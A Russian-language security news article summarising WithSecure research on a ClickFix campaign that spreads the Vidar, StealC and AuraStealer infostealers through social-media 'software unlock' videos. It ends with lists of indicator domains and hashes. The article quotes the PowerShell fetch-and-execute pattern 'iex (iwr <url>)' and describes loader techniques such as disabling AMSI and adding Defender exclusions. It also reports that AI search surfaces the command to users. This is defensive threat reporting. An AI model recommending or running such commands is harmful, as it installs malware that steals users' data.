Кибермошенники используют соцсети и ИИ для распространения программ-вымогателей через команды ClickFix

В феврале 2026 года команда Managed Detection and Response компании WithSecure расследовала инцидент в корпоративной сети, где выполнение команды ClickFix на рабочем компьютере сотрудника привело к внедрению вредоносной программы-похитителя данных Vidar. Последующий анализ, проведённый группой Strategic Threat Intelligence and Research (STINGR), показал, что подобные команды активно продвигаются через сотни, а потенциально тысячи, коротких видеороликов в таких социальных сетях, как Instagram*, Facebook* и TikTok. Эти видео, маскирующиеся под технические советы по "разблокировке" функций в популярном софте, набирают сотни тысяч просмотров каждый, а их совокупное количество исчисляется миллионами.

Зловредные ролики предлагают решения для якобы бесплатной активации премиум-функций или скрытых возможностей в таких приложениях, как Spotify, Microsoft Office, Adobe Photoshop, ChatGPT и многих других. Пользователи сталкиваются с ними органично, в своих лентах новостей. Важно отметить, что эффективность такой маскировки крайне высока: в одном из случаев жертва за несколько дней до инцидента легально использовала PowerShell для установки модификации клиента Spotify, что сделало последующий "взлом" через похожий тематический ролик психологически более правдоподобным. Специалисты WithSecure обнаружили, что эта активность является продолжением кампании, начавшейся ещё в январе 2025 года, однако текущее расследование выявило несколько новых ключевых аспектов.

Во-первых, кампания оказалась значительно шире, чем считалось ранее. Если изначально внимание было приковано к TikTok, то теперь она охватывает практически все крупные социальные платформы, включая YouTube и Threads. Во-вторых, хотя основной целью являются частные лица, риски напрямую затрагивают организации, особенно в условиях смешения личного и рабочего использования устройств. В-третьих, помимо прямого распространения через соцсети, видео из кампании эффективно отравляют результаты поисковых систем (SEO poisoning) и могут быть рекомендованы ИИ-агентами в ответ на запросы пользователей, что многократно расширяет потенциальную аудиторию жертв. Наконец, наблюдаются пересечения тактик, техник и процедур (TTP) с другими операциями, распространяющими похожие вредоносные программы через рекламу в Google и YouTube, а также посты на Reddit, что указывает на крупную и хорошо связанную экосистему доставки вредоносного кода.

Цепочка заражения начинается в момент, когда пользователь, следуя инструкциям из видео, копирует и выполняет в PowerShell команду вида "iex (iwr <url>)". Эта команда беcфайлово загружает и исполняет скрипт с удалённого URL. Для обхода анализа злоумышленники проверяют User-Agent запроса, отдавая вредоносный скрипт только если он содержит "PowerShell". Используемые домены часто короткие и выглядят легитимно, например, "msget[.]run", а конечные скрипты нередко размещаются на Cloudflare Pages. Функционал этих скриптов-загрузчиков включает в себя попытки отключить AMSI (интерфейс антивирусного сканирования Microsoft), проверки на наличие песочницы, закрепление в системе через ключи реестра или планировщик задач, а также добавление исключений в Защитник Windows. Конечной полезной нагрузкой чаще всего выступает похититель данных Vidar, но также встречаются StealC и AuraStealer.

Особую опасность представляют вторичные каналы распространения. Помимо лент соцсетей, короткие видео с инструкциями по "взлому" появляются в результатах обычного поиска в Google по соответствующим запросам. Более того, сама вредоносная команда ClickFix может быть предложена пользователю ИИ-режимом поиска Google, что превращает автоматизированного помощника в невольного соучастника атаки. Это создаёт эффект снежного кома, когда изначально узконаправленная социальная инженерия получает возможность поражать случайных пользователей, даже не видевших оригинальные ролики.

Анализ артефактов кампании выявил связи с более широкой экосистемой. Так, идентичные цепочки заражения продвигались через платную рекламу на YouTube. Другая связанная кампания использовала Google Search Ads, которые перенаправляли на сайт, маскирующийся под инструмент для "очистки" Windows, где в открытом виде был размещён тот самый опасный фрагмент кода. Примечательно, что в HTML-коде этого сайта присутствовали комментарии на русском языке, что может указывать на участие русскоязычных злоумышленников. Также были обнаружены скомпилированные версии PowerShell-скриптов, распространявшиеся через Reddit и GitHub под видом читов для игр, что вело к загрузке того же Vidar.

Феномен успеха ClickFix уходит корнями в прошлое. В 2000-х годах были популярны сайты, через социальную инженерию заставлявшие пользователей скачивать вредоносные файлы, например, под видом необходимого видеокодека. С улучшением защитных технологий, таких как Mark of the Web и сигнатурный анализ, прямая загрузка файлов стала менее эффективной. Эру сменили файловые атаки и злоупотребление встроенными системными бинарниками (LOLBins), которые выполняли код непосредственно в памяти. ClickFix стал логичным эволюционным шагом, объединив старую, проверенную социальную инженерию с современными методами бесфайлового исполнения. Ключевое отличие в том, что пользователь сам инициирует выполнение команды, что может обойти защитные механизмы, сфокусированные на блокировке подозрительных загрузок.

В заключение, данное расследование подчёркивает постоянную эволюцию угроз типа ClickFix. Уход от единичных фишинговых сайтов к мультиканальному распространению через видеоплатформы и отравление ИИ-генераторов резко увеличивает охват и потенциал для компрометации. Для организаций главный риск заключается в стирании границ между личным и рабочим использованием устройств, когда невинное действие сотрудника в соцсети может открыть злоумышленникам путь в корпоративную сеть. В текущих условиях, когда подобные атаки вряд ли пойдут на спад, критическую важность приобретают непрерывное обучение пользователей цифровой гигиене и сочетание технических мер защиты с повышенной осведомлённостью о подобных социально-инженерных уловках.

* Компания Meta и её продукты (включая Instagram, Facebook, Threads) признаны экстремистскими, их деятельность запрещена на территории РФ.

Domains

• activated.sh
• activator.tools
• activepro.cc
• backup-5de.pages.dev
• cdn-27z.pages.dev
• cdn-4gp.pages.dev
• crypted.pages.dev
• debloat.dev
• file-epq.pages.dev
• install-5yq.pages.dev
• installsh.pages.dev
• jacrcell.com
• keytool.cc
• lib-2j8.pages.dev
• lib-9ab.pages.dev
• msact.run
• msauth.cc
• msauth.in
• msget.run
• process-e7b.pages.dev
• py-3ow.pages.dev
• ravenfootballclub.com
• settings-320.pages.dev
• settings-4av.pages.dev
• settingss.pages.dev
• slmgr.sh
• slmgr.win
• slmgr.ws
• tmopgm.org.ng
• tranquilityparadise.com.np
• wslm.net

SHA256

• 39fcc9afc49b0db1a260f022d2277754f24d0ce0d78bb2a6acf0b48820f6a155
• 4ab7f5af2f965d71bf4804e9c2fd8907fbfa61477c8b796fb52ad9780c490df7
• 6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23
• 789284801ce260e1b5d0b1f1eca2aedcab472f5ccb8b8cfc89a1f8134bdc416c
• 792bf3c09a9c5b356b1d80e2ae4e4aff2ac928cb559221f3411f25bfdeca275a
• 81cadd9f24233803a201e3dacbe247db80aae5e038e2002118102a0f6c8b8243
• c9d98eaf38adb0bc078d8c197aebd4ddb9221a4d4833578ef6170252a2cf4398
• f2bddc0a8ddc8ad2bfe602d52b3e80c644eb74feae7c34d7b02e0f771f2ae0a4